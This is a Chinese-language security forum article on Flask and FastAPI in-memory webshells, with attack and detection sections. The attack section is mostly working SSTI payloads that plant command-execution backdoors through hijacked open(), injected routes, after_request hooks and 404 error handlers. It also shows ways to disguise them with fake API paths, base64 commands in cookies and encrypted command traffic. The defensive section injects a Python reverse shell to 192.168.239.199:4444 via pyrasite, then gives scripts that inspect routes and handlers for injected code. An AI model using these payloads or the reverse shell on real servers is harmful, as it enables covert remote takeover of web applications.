问答
发起
提问
文章
攻防
活动
Toggle navigation
首页
(current)
问答
商城
实战攻防技术
漏洞分析与复现
NEW
活动
摸鱼办
搜索
登录
注册
浅谈Flask内存马中的攻与防
渗透测试
从内存的角度出发来帮助蓝队查杀Py内存马,并且结合红队视角辅助查杀
### Red Team 受限于篇幅,我这里就简单介绍一下flask内存马的几种姿势,以ssti为例子,本质上还是调用exec,eval,compile这些内置底层函数 参考了这篇文章,写的不错:[Flask 内存马 - caterpie的小站](https://www.caterpie771.cn/2024/09/27/flask-%E5%86%85%E5%AD%98%E9%A9%AC/#flask%3E213) #### 函数劫持式(各路后端框架通用) 参考至:<https://err0r233.github.io/posts/25143.html> 目前全文没有相关思路,我只这里直接劫持底层的open()函数例如在flask中 ```py {{lipsum.__globals__['__builtins__']['exec']("global original_open original_open=globals()['__builtins__']['open'] def custom_open(*args,**kwargs): from flask import request if request.query_params.get("cmd"):return __import__('io').StringIO(__import__('os').popen(request.query_params.get("cmd")).read()) else:return original_open(*args,**kwargs) globals()['__builtins__']['open']=custom_open")}} ``` 这样再任何有返回open()文件内容的地方,就会输出cmd参数命令执行的结果了而且不会影响文件正常执行 稍加改动就可以在fastapi上动了 ```py config.__init__.__globals__['__builtins__']['exec']("global original_open original_open=globals()['__builtins__']['open'] def custom_open(*args,**kwargs): if request.query_params.get('cmd'):return __import__('io').StringIO(__import__('os').popen(request.query_params.get('cmd')).read()) else:return original_open(*args,**kwargs) globals()['__builtins__']['open']=custom_open",{"request":request}) ``` #### 添加路由式(flask高版本) 经典中的经典,但由于flask添加了保护机制,我们需要通过先操作`url_map`: ```py url_for.__globals__['__builtins__']['eval']( "app.url_map.add( app.url_rule_class('/shell', methods=['GET'], endpoint='shell') )", { 'app':url_for.__globals__['current_app'] } ) ``` 再去add\_rule: ```py url_for.__globals__['__builtins__']['eval']( "app.view_functions.update( { 'shell': lambda:__import__('os').popen( app.request_context.__globals__['request_ctx'].request.args.get('cmd', 'whoami') ).read() } )", { 'app':url_for.__globals__['current_app'] } ) ``` #### after\_request式 这个比较安全,在业务逻辑处理完成后再去到木马代码 ```py {{url_for.__globals__['__builtins__']['eval']("app.after_request_funcs.setdefault(None, []).append(lambda resp: CmdResp if request.args.get('cmd') and exec(\"global CmdResp;CmdResp=__import__(\'flask\').make_response(__import__(\'os\').popen(request.args.get(\'cmd\')).read())\")==None else resp)",{'request':url_for.__globals__['request'],'app':get_flashed_messages.__globals__['current_app']})}} ``` #### 错误触发式 这个隐蔽性高,只有访问错误的界面才会触发,比如404 ```py {{url_for.__globals__['__builtins__']['exec']("global exc_class;global code;exc_class,code=app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda error:__import__('os').popen(request.args.get('qwq')).read()", {'request':url_for.__globals__['request'],'app':get_flashed_messages.__globals__['current_app']})}} ``` #### 如何隐匿flask内存马? 例如我可以改成常见的路由:比如/api/log伪装成日志记录的api ```py url_for.__globals__['__builtins__']['eval']( "app.view_functions.update( { 'api/user/log': lambda:__import__('os').popen( app.request_context.__globals__['request_ctx'].request.args.get('cmd', 'whoami') ).read() } )", { 'app':url_for.__globals__['current_app'] } ) ``` 而且我们不要让命令和接受命令的参数为明文 ```py {{url_for.__globals__['__builtins__']['exec']("global exc_class;global code;exc_class,code=app._get_exc_class_and_code(404);app.error_handler_spec[None][code][exc_class] = lambda error: __import__('os').popen(__import__('base64').b64decode(request.cookies.get('userinfo')).decode('utf-8')).read()", {'request':url_for.__globals__['request'],'app':get_flashed_messages.__globals__['current_app']})}} ``` 例如我在这里加入了从cookie读取,userinfo作为用户传参。而且结合errhandler,你只要随便访问一个不存在的路由就能触发内存马,这样就可以根据被攻击服务的实时情况,来随时调整,例如/api/AccoutINFO,/getData... 你还可以通过异或加密输入和使用json格式配合flask原生的加解密返回来实现流量层级的隐匿 ```py global exc_class global code from itsdangerous import URLSafeSerializer from flask import request import json exc_class, code = app._get_exc_class_and_code(404) secret_key=''.join(chr(ord(a) ^ ord(b)) for a, b in zip('M8):M2uY[2%<^4+',',M[U?SX4>_VT;XG')) def execute_command(cmd,secret_key): serializer = URLSafeSerializer(secret_key) encrypted_userinfo=cmd if not encrypted_userinfo: return try: command = serializer.loads(encrypted_userinfo) except Exception as e: data = { 'status': 'error', 'message': 'Decryption failed', 'result': '' } try: result=None eval(command) except Exception as e: data = { 'status': 'error', 'message': str(e), 'result': '' } data = { 'status': 'ok', 'result': serializer.dumps(result) } return json.dumps(data) app.error_handler_spec[None][code][exc_class] = lambda error: execute_command(request.cookies.get('userinfo'), secret_key) #{{url_for.__globals__['__builtins__']['exec']("global exc_class\nglobal code\nfrom itsdangerous import URLSafeSerializer\nfrom flask import request\nimport json\nexc_class,code=app._get_exc_class_and_code(404)\nsecret_key=''.join(chr(ord(a)^ord(b))for(a,b)in zip('M8):M2uY[2%<^4+',',M[U?SX4>_VT;XG'))\ndef execute_command(cmd,secret_key):\n\tD='error';C='message';B='result';A='status';serializer=URLSafeSerializer(secret_key);encrypted_userinfo=cmd\n\tif not encrypted_userinfo:return\n\ttry:command=serializer.loads(encrypted_userinfo)\n\texcept Exception as e:data={A:D,C:'Decryption failed',B:''}\n\ttry:result=None;eval(command)\n\texcept Exception as e:data={A:D,C:str(e),B:''}\n\tdata={A:'ok',B:serializer.dumps(result)};return json.dumps(data)\napp.error_handler_spec[None][code][exc_class]=lambda error:execute_command(request.cookies.get('userinfo'),secret_key)", {'request':url_for.__globals__['request'],'app':get_flashed_messages.__globals__['current_app']})}} ``` 不过也有现成的pythonshell管理工具就是了,那个思路也不错 [orzchen/PyMemShell: Python内存马管理工具 Python MemShell](https://github.com/orzchen/PyMemShell) ### Blue Team #### 从内存取证 想要根除内存马当然是去内存找啦,什么流量分析都是隔靴搔痒 目前这部分内容是全网独一家的研究,我自己是比较偏向于使用pyrasite这个库配合自己的脚本实现的 ```py #!/usr/bin/env python3 import socket import sys import os import code def reverse_python_shell(target_ip, target_port): try: # 创建套接字并连接到监听端 sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((target_ip, target_port)) # 将标准输入、输出、错误重定向到套接字 sock_file = sock.makefile("rw") sys.stdin = sock_file sys.stdout = sock_file sys.stderr = sock_file # 打印欢迎信息 print(f"Connected to {target_ip}:{target_port}") print("Python interactive shell is ready. Type Python code to execute.") # 启动 Python 交互式解释器 shell =code.InteractiveConsole(globals()) shell.interact() except Exception as e: # 如果发生错误,发送错误信息并关闭连接 try: sock.sendall(f"Error: {str(e)}\n".encode()) except: pass finally: sock.close() if __name__ == "__main__": # 配置目标 IP 和端口 target_ip = "192.168.239.199" # 替换为监听端的 IP target_port = 4444 # 替换为监听端的端口 reverse_python_shell(target_ip, target_port) ``` 将上述代码保存为shell-rev-py.py并且开好nc接受,然后再安装了pyrasite库的情况下直接注入 python进程: ```bash pyrasite (pgrep -f "python3") shell-rev-py.py --verbose ``` 便可大功告成 ```php PS C:\Users\20232\Desktop> ncat -lvvp 4444 Ncat: Version 7.95 ( https://nmap.org/ncat ) Ncat: Listening on [::]:4444 Ncat: Listening on 0.0.0.0:4444 Ncat: Connection from 192.168.239.199:26475. Connected to 192.168.239.199:4444 Python interactive shell is ready. Type Python code to execute. Python 3.12.7 (main, Nov 8 2024, 17:55:36) [GCC 14.2.0] on linux Type "help", "copyright", "credits" or "license" for more information. (InteractiveConsole) >>> ``` 首先拿我们的errorhandler开杀 我们只要对上述代码稍加改动: ```py global exc_class;global code;exc_class,code=app._get_exc_class_and_code(404); memshell=app.error_handler_spec[None][code][exc_class] ``` 并且结合反汇编: ```php import dis dis.dis(memshell) ``` ```php >>> memshell=app.error_handler_spec[None][code][exc_class] >>> dis.dis(memshell) 16 0 RESUME 0 2 LOAD_GLOBAL 1 (NULL + execute_command) 12 LOAD_GLOBAL 2 (request) 22 LOAD_ATTR 4 (cookies) 42 LOAD_ATTR 7 (NULL|self + get) 62 LOAD_CONST 1 ('userinfo') 64 CALL 1 72 LOAD_GLOBAL 8 (secret_key) 82 CALL 2 90 RETURN_VALUE ``` 便可让其露出马脚 同样的,针对before&after\_request内存马,我们则可以使用: ```php >>> app.after_request_funcs defaultdict(<class 'list'>, {None: [<function <lambda> at 0x7f4978b647c0>]}) >>> app.after_request_funcs defaultdict(<class 'list'>, {None: [<function <lambda> at 0x7f4978b647c0>]}) ``` 而经典的路径内存马,我们则可以通过: app.url\_map.iter\_rules()来查杀,配合反汇编 ```py print("Registered routes:") for rule in app.url_map.iter_rules(): print(f"Endpoint: {rule.endpoint}, Methods: {rule.methods}, Rule: {rule.rule}") ``` 还有一个思路就是去检查内存代码中对应的本地文件,配合原生的inspect模块 ```py import inspect # 假设发现了一个可疑的函数 suspicious_function suspicious_function = app.view_functions["test"] # 打印函数的来源 print("Function name:", suspicious_function.__name__) print("Source file:", inspect.getfile(suspicious_function)) print("Source code:") print(inspect.getsource(suspicious_function)) ``` 如果发现不存在就是内存马了 你也可以查看动态注入的路由 ```py print("Registered endpoints and functions:") for endpoint, func in app.view_functions.items(): print(f"Endpoint: {endpoint}, Function: {func}, File: {inspect.getfile(func)}") ``` 我总结了个排查脚本: ```py #!/usr/bin/env python3 import sys import os import base64 import dis import inspect from collections import defaultdict OUTPUT_FILE = "/tmp/flask_memshell_analysis.txt" # 输出文件路径 def save_to_file(data): """将数据保存到文件""" with open(OUTPUT_FILE, "a") as f: f.write(data + "\n") def analyze_function(func, description): """分析函数,提取字节码和反汇编信息""" try: # 获取字节码 bytecode = func.__code__.co_code bytecode_b64 = base64.b64encode(bytecode).decode() # 获取反汇编信息 disassembled = dis.Bytecode(func) disassembled_str = "\n".join([f"{instr.opname} {instr.argrepr}" for instr in disassembled]) # 保存结果 save_to_file(f"=== {description} ===") save_to_file(f"Function: {func.__name__}") save_to_file(f"File: {inspect.getfile(func)}") save_to_file(f"Base64 Bytecode: {bytecode_b64}") save_to_file(f"Disassembled Bytecode:\n{disassembled_str}") save_to_file("\n") except Exception as e: save_to_file(f"Error analyzing function {func}: {str(e)}\n") def check_dynamic_routes(app): """检查动态注册的路由""" save_to_file("=== Dynamic Routes ===") try: for rule in app.url_map.iter_rules(): func = app.view_functions[rule.endpoint] save_to_file(f"Endpoint: {rule.endpoint}, Methods: {rule.methods}, Rule: {rule.rule}") analyze_function(func, f"Route Function ({rule.endpoint})") except Exception as e: save_to_file(f"Error checking routes: {str(e)}\n") def check_before_request(app): """检查 before_request 中的函数""" save_to_file("=== Before Request ===") try: for func in app.before_request_funcs.get(None, []): analyze_function(func, "Before Request Function") except Exception as e: save_to_file(f"Error checking before_request: {str(e)}\n") def check_after_request(app): """检查 after_request 中的函数""" save_to_file("=== After Request ===") try: for func in app.after_request_funcs.get(None, []): analyze_function(func, "After Request Function") except Exception as e: save_to_file(f"Error checking after_request: {str(e)}\n") def check_error_handlers(app): """检查 errorhandler 中的函数""" save_to_file("=== Error Handlers ===") try: for code, handler_map in app.error_handler_spec[None].items(): for exc_class, func in handler_map.items(): analyze_function(func, f"Error Handler ({exc_class}, {code})") except Exception as e: save_to_file(f"Error checking error handlers: {str(e)}\n") def main(): """主函数""" save_to_file("=== Flask Memory Shell Analysis ===") save_to_file(f"Injected into process PID: {os.getpid()}\n") if 'app' not in globals(): save_to_file("Error: No 'app' variable found in globals.\n") return app = globals()['app'] save_to_file(f"Flask app detected: {repr(app)}\n") # 检查动态路由 check_dynamic_routes(app) # 检查 before_request check_before_request(app) # 检查 after_request check_after_request(app) # 检查 errorhandler check_error_handlers(app) save_to_file("=== Analysis Complete ===\n") if __name__ == "__main__": main() ``` 同样的也可以查杀fastapi ```py import sys import inspect from fastapi.routing import APIRoute from starlette.middleware.base import BaseHTTPMiddleware def detect_middleware_injection(app): """ 检查 FastAPI 应用中的中间件,检测是否有恶意注入的中间件。 """ print("=== Checking Middlewares ===") for index, middleware in enumerate(app.user_middleware): try: dispatch_func = middleware.options.get("dispatch", None) if dispatch_func: print(f"Middleware {index}: {middleware.cls.__name__}") print(f"Dispatch function: {dispatch_func}") # 检查是否是动态定义的函数 if inspect.isfunction(dispatch_func): source_file = inspect.getfile(dispatch_func) if source_file == "<string>": print(f" [ALERT] Middleware {index} has dynamically defined dispatch function!") print(f" Function source: {inspect.getsource(dispatch_func)}") else: print(f" Source file: {source_file}") except Exception as e: print(f"Error analyzing middleware {index}: {e}") def detect_route_injection(app): """ 检查 FastAPI 应用中的路由,检测是否有动态注入的路由。 """ print("=== Checking Routes ===") for route in app.routes: if isinstance(route, APIRoute): endpoint = route.endpoint try: # 检查路由的 endpoint 函数 source_file = inspect.getfile(endpoint) if source_file == "<string>": print(f" [ALERT] Route {route.path} has dynamically defined endpoint!") print(f" Endpoint source: {inspect.getsource(endpoint)}") else: print(f" Route {route.path} -> Endpoint: {endpoint.__name__}") print(f" Source file: {source_file}") except Exception as e: print(f"Error analyzing route {route.path}: {e}") def main(): """ 主函数,执行所有检测逻辑。 """ if "app" not in sys.modules["__main__"].__dict__: print("Error: No FastAPI app instance found in the main module.") return app = sys.modules["__main__"].__dict__["app"] print(f"Detected FastAPI app: {app}") # 检查中间件 detect_middleware_injection(app) # 检查路由 detect_route_injection(app) if __name__ == "__main__": main() ```
发表于 2025-02-11 10:06:36
阅读 ( 694 )
分类:
WEB安全
1 推荐
收藏
0 条评论
请先
登录
后评论
7ech_N3rd
3 篇文章
×
发送私信
请先
登录
后发送私信
×
举报此文章
垃圾广告信息:
广告、推广、测试等内容
违规内容:
色情、暴力、血腥、敏感信息等内容
不友善内容:
人身攻击、挑衅辱骂、恶意行为
其他原因:
请补充说明
举报原因:
×
如果觉得我的文章对您有用,请随意打赏。你的支持将鼓励我继续创作!